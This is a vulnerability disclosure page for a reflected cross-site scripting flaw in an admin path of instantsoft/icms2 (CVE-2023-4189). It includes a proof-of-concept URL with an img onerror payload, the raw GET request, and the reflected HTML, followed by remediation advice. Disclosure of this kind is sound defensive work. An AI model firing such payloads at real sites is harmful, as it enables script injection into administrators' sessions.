Lucene search
LegpainsB00E6986-64E7-464E-BA44-E42476BFCDC4HistoryAug 04, 2023 - 10:42 a.m.
Reflected XSS in URL path of '/admin/controllers/edit/activity/perms/'
2023-08-0410:42:58
legpains
www.huntr.dev
11
xss
url input
sanitization
admin session
reflected
0.0004 Low
EPSS
Percentile
14.2%
Description
/admin/controllers/edit/activity/perms/ takes input from the URL directly without sufficient sanitization leading to a Reflected XSS.
A valid admin session is required, without it, the user will be brought to the login page instead of the affected page.
Proof of Concept
- Login as an administrator
- Visit the following URL to trigger JavaScript code:
http://icms.local/admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E
Payload
"><img src>
Request:
GET /admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E HTTP/1.1
Host: icms.local
[...]
The inserted input would then be reflected on the page like this:
<form action="/admin/controllers/edit/activity/perms_save/"><img src>" method="post">
Remedial Action
It is recommended to sanitize the input before it is reflected on the affected page.
Related
cve
cve
CVE-2023-4189
2023-08-05 20:15:17
prion
prion
Cross site scripting
2023-08-05 20:15:00
nvd
nvd
CVE-2023-4189
2023-08-05 20:15:17
osv
osv
CVE-2023-4189
2023-08-05 20:15:17
cvelist
cvelist
CVE-2023-4189 Cross-site Scripting (XSS) - Reflected in instantsoft/icms2
2023-08-05 19:17:54